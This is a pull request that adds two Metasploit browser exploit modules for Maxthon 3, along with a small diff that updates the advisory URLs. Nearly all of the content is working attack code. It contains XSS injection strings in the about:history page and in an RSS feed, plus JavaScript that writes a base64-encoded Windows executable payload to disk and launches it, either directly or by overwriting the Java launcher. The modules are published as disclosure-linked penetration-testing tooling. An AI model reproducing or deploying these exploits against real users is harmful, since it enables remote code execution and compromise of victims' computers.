### PR TITLE
Maxthon3

### DIFF
--- a/modules/exploits/windows/browser/maxthon_history_xcs.rb
+++ b/modules/exploits/windows/browser/maxthon_history_xcs.rb
@@ -1,0 +1,167 @@
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name' => 'Maxthon about:history XCS',
+			'Description' => %q{
+				Cross Context Scripting (XCS) is possible in the Maxthon about:history page.
+				Injection in such privileged/trusted browser zone can be used to modify configuration settings and
+				execute arbitrary commands. Affects Maxthon 3 browsers.
+			},
+			'License' => BSD_LICENSE,
+			'Author' =>
+					[ 'Roberto Suggi Liverani', # Discovered the vulnerability and developed msf module
+					],
+			'Version' => '$Revision: 1 $',
+			'References' =>
+				[
+						['CVE', 'TBA'],
+						['URL', 'http://blog.malerisch.net/2012/11/maxthon-cross-context-scripting-xcs-about-history-rce.html'],
+				],
+			'Payload' =>
+				{
+				'DisableNops' => true,
+				},
+			'Targets' =>
+				[
+					['Maxthon 3',
+						{
+							'Platform' => 'win',
+						}
+					],
+				],
+			'DisclosureDate' => 'Nov 26 2012',
+			'DefaultTarget' => 0
+		))
+
+		register_options(
+			[
+				OptString.new('JPATH', [true, "Java executable path to overwrite", 'C:\\\\Program\\ Files\\\\Java\\\\jre7\\\\bin\\\\jp2launcher.exe']),
+				OptString.new('JAVAURL', [true, "Java Applet URL", 'http://profs.etsmtl.ca/mmcguffin/learn/java/01-drawingLines/']),
+			], self.class
+
+		)
+	end
+
+	def on_request_uri(cli, request)
+
+		jpath = datastore['JPATH']
+		javaurl = datastore['JAVAURL']
+
+		headers = {}
+		html_hdr = %Q^
+			<html>
+			<head>
+			<title>Loading</title>
+			^
+		html_ftr = %Q^
+			</head>
+			<body >
+			<h1>Loading</h1>
+			</body></html>
+			^
+
+		case request.uri
+			when /[?]jspayload/
+				p = regenerate_payload(cli)
+				if (p.nil?)
+					send_not_found(cli)
+					return
+				end
+				# We're going to run this through unescape(), so make sure
+				# everything is encoded
+				penc = Msf::Util::EXE.to_win32pe(framework, p.encoded)
+				penc2 = Rex::Text.encode_base64(penc)
+				# now this is base64 encoded payload which needs to be passed to the file write api in maxthon
+				# depending on maxthon version, then file can be launched via Program DOM API
+				# or replacing Java program
+				content =
+						%Q{
+					var fileTemp = new maxthon.io.File.createTempFile("test","exe");
+					var fileObj = maxthon.io.File(fileTemp);
+					maxthon.io.FileWriter(fileTemp);
+
+
+					if(maxthon.program)
+					{
+					maxthon.io.writeDataURL("data:application/x-msdownload;base64,#{penc2}");
+					maxthon.program.Program.launch(fileTemp.name_,"C:");
+					}
+
+					else
+					{
+					// here we need to take a dirty approach, we need to overwrite an existing exe and then invoke it
+					// this is because the maxthon.program object has been silently removed in latest Maxthon versions...
+					// in WindowsXP, any exe can be overwritten, then a simple call to a uri scheme can invoke the exe
+					// e.g. wab.exe invoked via mailto://
+					// however, in win7, a prompt will be displayed if browser executes a mail client or an external program
+					// so a common way to exploit would be to overwrite the j2plauncher.exe, which calls java.exe when applet is found
+					// once that is done, then we can point to a page where a java applet exists which will invoke java.exe,
+					// unless previously loaded by the user
+					//
+					fileTemp.name_ = "#{jpath}";
+					maxthon.io.writeDataURL("data:application/x-msdownload;base64,#{penc2}");
+
+					a=document.createElement("iframe");
+					a.setAttribute("src","#{javaurl}");
+					document.body.appendChild(a)
+
+					}
+
+				}
+
+			when /[?]history/
+				js = %Q^
+				window.onload = function() {
+					location.href = "about:history";
+				}
+				^
+				content = %Q^
+				#{html_hdr}
+				<script>
+				#{js}
+				</script>
+				#{html_ftr}
+				^
+			when get_resource()
+				print_status("Sending #{self.name} payload for request #{request.uri}")
+
+				js = %Q^
+
+				url = location.href;
+				url2 = url + "?jspayload=1";
+
+				inj = "?history#%22/><img src=a onerror=%22"
+
+				inj_1 = "a=document.createElement('script');a.setAttribute('src','"+url2+"');document.body.appendChild(a);";
+
+
+				window.location = unescape(inj) + inj_1;
+
+
+
+
+				^
+				content = %Q^
+				#{html_hdr}
+				<script>
+				#{js}
+				</script>
+				#{html_ftr}
+				^
+			else
+				print_status("Sending 404 for request #{request.uri}")
+				send_not_found(cli)
+				return
+		end
+
+		send_response_html(cli, content, headers)
+		handler(cli)
+	end
+
+end

--- a/modules/exploits/windows/browser/maxthon_history_xcs.rb
+++ b/modules/exploits/windows/browser/maxthon_history_xcs.rb
@@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'References' =>
 				[
 						['CVE', 'TBA'],
-						['URL', 'http://blog.malerisch.net/2012/11/maxthon-cross-context-scripting-xcs-about-history-rce.html'],
+						['URL', 'http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html'],
 				],
 			'Payload' =>
 				{

--- a/modules/exploits/windows/browser/maxthon_rss_xcs.rb
+++ b/modules/exploits/windows/browser/maxthon_rss_xcs.rb
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'References' =>
 				[
 					['CVE', 'TBA'],
-					['URL', 'http://blog.malerisch.net/2012/11/maxthon-cross-context-scripting-xcs-rss-rce.html'],
+					['URL', 'http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-rss-rce.html'],
 				],
 			'Payload' =>
 				{

--- a/modules/exploits/windows/browser/maxthon_rss_xcs.rb
+++ b/modules/exploits/windows/browser/maxthon_rss_xcs.rb
@@ -1,0 +1,114 @@
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name' => 'Maxthon RSS Preview',
+			'Description' => %q{
+				RSS feed content is rendered by Maxthon in a trusted/privileged zone.
+				Injection in such privileged/trusted browser zone can be used to modify configuration settings and execute arbitrary commands.
+				Affects Maxthon 3 browsers.
+			},
+			'License' => BSD_LICENSE,
+			'Author' =>
+				[
+					'Roberto Suggi Liverani', # Discovered the vulnerability and developed msf module
+				],
+			'Version' => '$Revision: 1 $',
+			'References' =>
+				[
+					['CVE', 'TBA'],
+					['URL', 'http://blog.malerisch.net/2012/11/maxthon-cross-context-scripting-xcs-rss-rce.html'],
+				],
+			'Payload' =>
+				{
+					'DisableNops' => true,
+				},
+			'Targets' =>
+				[
+					['Maxthon 3',
+						{
+							'Platform' => 'win',
+						}
+					],
+				],
+
+			'DisclosureDate' => 'Nov 26 2012',
+
+			'DefaultTarget' => 0
+
+			))
+
+		register_options(
+			[
+				OptString.new('JPATH', [true, "Java executable path to overwrite", 'C:\\\\Program\\ Files\\\\Java\\\\jre7\\\\bin\\\\jp2launcher.exe']),
+				OptString.new('JAVAURL', [true, "Java Applet URL", 'http://profs.etsmtl.ca/mmcguffin/learn/java/01-drawingLines/']),
+			], self.class
+
+		)
+
+
+	end
+
+	def on_request_uri(cli, request)
+
+		jpath = datastore['JPATH']
+		javaurl = datastore['JAVAURL']
+
+		headers = {}
+		html_hdr = %Q^
+			<html>
+			<head>
+			<title>Loading</title>
+			^
+		html_ftr = %Q^
+			</head>
+			<body >
+			<h1>Loading</h1>
+			</body></html>
+			^
+
+		case request.uri
+
+			when get_resource()
+				print_status("Sending #{self.name} payload for request #{request.uri}")
+				p = regenerate_payload(cli)
+				if (p.nil?)
+					send_not_found(cli)
+					return
+				end
+				penc = Msf::Util::EXE.to_win32pe(framework, p.encoded)
+				penc2 = Rex::Text.encode_base64(penc)
+
+				js = %Q|var fileTemp=new maxthon.io.File.createTempFile("test","exe");var fileObj=maxthon.io.File(fileTemp);maxthon.io.FileWriter(fileTemp);if(maxthon.program){maxthon.io.writeDataURL("data:application/x-msdownload;base64,#{penc2}");maxthon.program.Program.launch(fileTemp.name_,"C:"); } else {fileTemp.name_ = "#{jpath}"; maxthon.io.writeDataURL("data:application/x-msdownload;base64,#{penc2}");a=document.createElement("iframe");a.setAttribute("src","#{javaurl}");document.body.appendChild(a)}|
+
+
+				content = %Q|<?xml version="1.0" encoding="ISO-8859-1" ?>
+				<rss version="2.0">
+				<channel>
+				<description>Malerisch.net</description>
+				<link>http://blog.malerisch.net/</link>
+				<title>Malerisch.net</title>
+				<item>
+				<title>test</title>
+				<link>javascript:alert(window.location);</link>
+				<description>07/09/2008 - test &lt;img src=a onerror='#{js}'&gt;</description>
+				<pubDate>Sun, 07 Sep 2008 12:00:00 GMT</pubDate>
+				</item>
+				</channel>
+				</rss>|
+			else
+				print_status("Sending 404 for request #{request.uri}")
+				send_not_found(cli)
+				return
+		end
+
+		send_response_html(cli, content, headers)
+		handler(cli)
+	end
+
+end


### PR DESCRIPTION
Added two Metasploit modules for vulnerabilities discovered in Maxthon 3 browser.
The exploits refer to the following advisories:
http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html
http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-rss-rce.html
